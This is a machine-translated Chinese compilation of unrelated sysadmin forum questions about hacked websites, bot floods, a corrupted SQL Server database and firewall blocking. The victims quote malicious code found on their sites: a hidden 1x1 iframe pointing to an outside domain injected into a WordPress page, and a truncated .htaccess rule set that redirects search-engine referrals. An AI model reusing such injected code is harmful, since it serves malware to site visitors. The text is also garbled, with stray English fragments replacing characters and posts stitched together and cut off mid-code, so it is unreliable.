好吧,这是令人沮丧的,我的网站在过去的三天中有数千个页面浏览量/连接,最后我们耗尽了每月的带宽。 我们购买了更多的带宽,closures了网站进行维护。 我们检查了日志,发现了一个负责任的IP并将其禁止,但是当我们打开这个网站的时候,攻击仍在继续。 这次来自不同国家的多个IP,他们访问了我们网站的不同页面数千次。 我们应该做什么? 编辑这可能是重要的:机器人或黑客或似乎坚持一个网页,并一遍又一遍地访问它(如我们的论坛会员页面),但当我们限制该页面的权限,它只是去find其他地方。 奇怪的。
我有一个非常特殊的情况,我已经做了好几天了。 我有一个非常大的SQL Server 2008数据库(约2 TB),其中包含500个文件组以支持非常大的分区表。 最近我们在一个驱动器上发生了一次灾难性的失败,丢失了几个文件组,数据库变得无法访问。 我们每天都在进行文件组备份,但由于其他问题,我们丢失了日志和主文件组的最新备份。 我们备份了所有数据,但主文件组备份已旧。 自主文件组备份以来,没有任何模式更改,但lsn现在全部不同步,我们无法恢复数据。 我已经尝试了所有我能想到的(并且已经尝试了几乎所有的技巧,而且我可以google),但是我仍然得到同样的信息,说明文件组x的文件与主文件组不匹配。 我现在正试图编辑系统表(我们有一个单独的临时环境来做到这一点,所以我们不担心会破坏任何生产数据库)。 我已经尝试更新sys.sysdbreg,sys.sysbrickfiles和sys.sysprufiles,试图欺骗SQL,认为所有的文件都在线,但“select*从OPENROWSET(TABLE DBPROP,5)”显示不同的数据库状态我在sys.sysdbreg中看到。 我现在想我需要以某种方式编辑实际数据文件的头文件,以尝试将lsn与主文件alignment。 我很欣赏任何人可以在这里给我的帮助,但请不要用“你不应该编辑mdf,ndf文件….”或“看到MSDN文章….”等等这样的回应。一个先进的紧急情况,我需要一个真正的黑客,所以我们可以得到在这个损坏的数据库中的数据,并导出到一个新的数据库。 我知道有一种方法可以做到这一点,但不知道DBPROP系统函数做了什么(例如看系统表还是实际打开文件),使我无法想出如何愚弄SQL让我阅读这些文件。 谢谢你的帮助。
我认为这是一些types的黑客攻击。 我试图谷歌它,但我得到的网站看起来像他们已经被利用。 我看到了一个看起来像这样的页面的请求。 /listMessages.asp?page=8&catid=5+%28200+ok%29+ACCEPTED “(200 OK)ACCEPTED”是奇怪的。 但它似乎没有做任何事情。 我在IIS 5和ASP 3.0上运行。 这是“黑客”意味着一些其他types的Web服务器? 编辑: 普通的请求看起来像: /listMessages.asp?page=8&catid=5
我不知道这是怎么发生的。 有人从我的所有域中删除了我的index.php文件,并把他自己的index.php文件与下一条消息: 黑客Z4i0n – 致命错误 – 2009 [致命错误组Br] Site desfigurado por Z4i0n Somos:Elemento_pcx – s4r4d0 – Z4i0n – Belive Gr33tz:W4n73d – M4v3rick – 观察 – MLK – l3nd4 – Soul_Fly 2009年 我的网域有很多子域名,但只有可以使用特定用户访问的子域名被黑了,其余的都没有受到影响。 我假设有人通过SSH进入,因为这些子域名中的一些是空的,Google不知道这些子域名。 但是我使用最后一个命令检查了访问日志,但是在攻击当天,没有通过SSH或FTP显示任何活动。 我已经改变了我的密码。 你推荐我做什么? UPDATE 我的网站托pipe在Dreamhost 。 我想他们已经安装了最新的补丁。 但是,当我看他们如何进入我的服务器, 我发现奇怪的事情。 在我的一个子域中, 服务器上有很多执行命令的脚本,上传文件,发送大量电子邮件和显示折衷信息。 这些文件自去年十二月以来已经创build! 我已经删除这些文件,我正在寻找更多的恶意文件。 也许安全保留是一个旧的和被遗忘的PHP应用程序。 这个应用程序有一个file uploadforms的保护密码系统基于会话。 其中一个恶意脚本位于上传目录中。 这似乎不像一个SQL注入攻击。
我正在一家有偏执狂客户的小型IT公司工作,所以安全一直是我们重要的考虑因素。 过去,我们已经要求两个独立的公司( Dionach和GSS )进行渗透testing。 我们也使用Nessus进行了一些自动化的渗透testing。 这两名审计师获得了很多内幕消息,几乎没有发现任何内容* 虽然觉得我们的系统是完全安全的(我们当然很愿意在向我们的客户进行尽职调查时向他们展示这些报告),但是我很难相信我们已经实现了一个完全安全的系统特别是考虑到我们公司没有安全专家(安全一直是个问题,而且我们完全是偏执狂,这有所帮助,但事实远非如此!) 如果黑客可以入侵可能雇用至less几个人,他们的唯一任务是确保他们的数据保密,那么他们肯定可以入侵我们的小企业,对吗? 有人有聘请“道德黑客”的经验吗? 如何find一个? 需要多less费用? *他们给我们的唯一build议是在两台windows服务器上升级我们的远程桌面协议,他们只能访问正确的非标准端口并将其IP地址列入白名单。
最终更新: 在过去的几个星期里,事情已经和平了,并且教会了我更多关于网站安全和风险的信息。 这是我的故事版本 – 我正在使用一个老版本的WordPress,可能这个人从谷歌抓到我。 我认为这是一个脚本攻击。 很难说什么时候,什么时候安全实际上是妥协的,这是我在2009年11月5日发现的。当时我采取了一些安全措施(如下所述),但总是有可能错过了在改变wordpress密码的时候我格式化了我的工作电脑。 现在我已经从主机中删除了所有不需要的PHP脚本,只让我的IP访问pipe理部分,阻止了一个属于越南的特定IP范围。 每日备份和其他的东西。 事情就是有太多的variables涉及到,而且很难跟踪每一件事情。 主要的教训是为它做好准备。 🙂 我正在通过GoDaddy共享托pipe计划并运行一个WordPress网站。 我的网站是在2009年11月5日第一次被黑客攻击的。当时黑客用自己的广告replace了我的广告。 我以为这是因为我对安全的懒惰而发生的,但是我错了。 我格式化了我的电脑,并再次设置一切。 用Microsoft Security Essentials取代了ESET NOD32。 升级到最新版本的WordPress。 更改了所有密码。 build立一个新的数据库。 和其他安全相关的东西我读到这里和那里。 事情有一段时间运行良好,直到我的网站今天再次被黑客攻击。 上次,这个人玩了很多文件,特别是改变了footer.php和所有与广告有关的文件。 但是这次他只是去了正确的地方,换成下面的代码 – <IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME> <form action="http://www.google.com/cse" id="cse-search-box"> <div> <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" /> <input type="hidden" name="ie" value="ISO-8859-1" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" […]
在北美还是其他地方,服务器pipe理员是否有责任让服务器易受攻击? 例如,如果在IIS中存在一个已知的漏洞攻击 – 微软为它发布一个补丁,并且出于X原因,你不会将其应用到你的服务器上,那么你的网站就会被黑客入侵,结果你最终会感染恶意软件这最终可能会导致经济损失。 你是否可以承担责任? 这是主观的,显然不是我所做的;)只是好奇。
我想设置一个阻止来自EC2的ssh请求的规则,因为我已经看到大量基于ssh的攻击,并且想知道是否有人知道他们的IP范围是什么。 编辑:谢谢你的答案,我继续执行iptables规则如下。 我暂时忽略所有的stream量。 logging它只是为了看看这些规则是否正常工作,以及EC2发送多less废话的统计信息;) #EC2 Blacklist $IPTBLS -A INPUT -s 67.202.0.0/18 -j LOG –log-prefix "<firewall> EC2 traffic " $IPTBLS -A INPUT -s 67.202.0.0/18 -j DROP $IPTBLS -A INPUT -s 72.44.32.0/19 -j LOG –log-prefix "<firewall> EC2 traffic " $IPTBLS -A INPUT -s 72.44.32.0/19 -j DROP $IPTBLS -A INPUT -s 75.101.128.0/17 -j LOG –log-prefix "<firewall> EC2 traffic […]
我的网站被黑了,在这一点上,我知道一些细节,但是我不知道如何发生,以及未来如何预防。 我需要你的帮助,试图解剖攻击,以便我可以防止它再次发生。 这有点长,但我想确保我提供足够的信息来帮助解决问题。 这是发生了什么事。 几个星期前,我从我的托pipe公司GoDaddy收到一封电子邮件,说我的网站使用了太多的资源,他们希望MySQL查询是罪魁祸首。 有问题的查询是一个有5-6个术语的search查询。 我设置的方式越多,search的条件越多,查询就越复杂。 没问题。 我解决了这个问题,但同时,GoDaddy也暂时closures了我的帐户,大概3天之后,一切恢复正常。 事件发生后,我的search引擎stream量急剧下降,大约90%。 它吸了一口气,我没有想到这件事,把它写到查询失败,并认定它会及时返回,因为谷歌recrawled网站。 它没有。 几天前,我收到一封用户的电子邮件,说我的网站托pipe恶意软件。 我直接在浏览器中加载网站,但没有看到任何东西注入页面。 然后我检查我的.htaccess文件,发现以下内容: <IfModule mod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} […]
我的公司在北美有一个Google Compute Engine服务器。 我们有这么多的中国IP地址向端口11发送请求,这是为我们的入口花钱。 我们的防火墙已经阻止了与中国的所有连接,因为他们没有业务访问我们的应用程序。 有没有一种方法可以完全忽略这些连接,或者阻止这些连接被阻塞,从而不会消耗带宽?